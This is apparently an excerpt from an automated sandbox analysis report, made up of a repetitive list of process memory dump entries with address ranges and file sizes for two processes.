                                                                                          52KB

                                                                                        • memory/2524-64-0x00007FFD31DF0000-0x00007FFD31E09000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2524-62-0x00007FFD21FB0000-0x00007FFD2212F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2524-200-0x00007FFD21FB0000-0x00007FFD2212F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2524-60-0x00007FFD318D0000-0x00007FFD318F4000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2524-443-0x00000239748B0000-0x0000023974DE3000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2524-56-0x00007FFD321B0000-0x00007FFD321DD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2524-44-0x00007FFD3AA00000-0x00007FFD3AA0F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/2524-31-0x00007FFD328A0000-0x00007FFD328C5000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2524-26-0x00007FFD22460000-0x00007FFD22B25000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2524-305-0x00007FFD31890000-0x00007FFD318C3000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2524-388-0x00007FFD219A0000-0x00007FFD21ED3000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2524-85-0x00007FFD20DB0000-0x00007FFD20ECA000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2524-58-0x00007FFD31F50000-0x00007FFD31F6A000-memory.dmp

                                                                                          Filesize

                                                                                          104KB

                                                                                        • memory/2524-389-0x00000239748B0000-0x0000023974DE3000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2524-392-0x00007FFD328A0000-0x00007FFD328C5000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2524-405-0x00007FFD20DB0000-0x00007FFD20ECA000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2524-391-0x00007FFD22460000-0x00007FFD22B25000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2524-397-0x00007FFD21FB0000-0x00007FFD2212F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2524-428-0x00007FFD22460000-0x00007FFD22B25000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2524-439-0x00007FFD219A0000-0x00007FFD21ED3000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2524-438-0x00007FFD21EE0000-0x00007FFD21FAE000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/2524-81-0x00007FFD31E50000-0x00007FFD31E5D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2524-436-0x00007FFD31F40000-0x00007FFD31F4D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2524-435-0x00007FFD31DF0000-0x00007FFD31E09000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2524-434-0x00007FFD21FB0000-0x00007FFD2212F000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2524-433-0x00007FFD318D0000-0x00007FFD318F4000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2524-432-0x00007FFD31F50000-0x00007FFD31F6A000-memory.dmp

                                                                                          Filesize

                                                                                          104KB

                                                                                        • memory/2524-431-0x00007FFD321B0000-0x00007FFD321DD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2524-430-0x00007FFD3AA00000-0x00007FFD3AA0F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/2524-429-0x00007FFD328A0000-0x00007FFD328C5000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2524-442-0x00007FFD20DB0000-0x00007FFD20ECA000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2524-441-0x00007FFD31E50000-0x00007FFD31E5D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2524-376-0x00007FFD21EE0000-0x00007FFD21FAE000-memory.dmp

                                                                                          Filesize

                                                                                          824KB

                                                                                        • memory/3268-314-0x000001EC8F790000-0x000001EC8F798000-memory.dmp

                                                                                          Filesize

                                                                                          32KB